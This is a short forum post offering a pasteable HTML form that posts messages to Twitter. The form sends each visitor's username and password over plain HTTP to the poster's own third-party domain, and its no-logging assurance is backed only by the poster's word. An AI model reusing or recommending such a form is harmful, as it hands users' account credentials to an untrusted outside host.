Twitter Poster

athiwatc

New Member
Messages
155
Reaction score
0
Points
0
I just started to offer this SIMPLE script
<FORM action=”http://bluebirdtr.co.cc/twitterpost.php” method=”post”> <P> <LABEL for=”user”>Username: </LABEL> <INPUT type=”text” name=”user”><BR> <LABEL for=”pwd”>Password: </LABEL> <INPUT type=”password” name=”pwd”><BR> <LABEL for=”msg”>Message: </LABEL> <INPUT type=”text” name=”msg”><BR> <INPUT type=”submit” value=”Send”> <INPUT type=”reset”> </P> </FORM>
Just paste in your website you can change it in anyway you want.

This will post the message to your twitter state.
I do not log your ID, PWD or message.
Try it out!
 
Top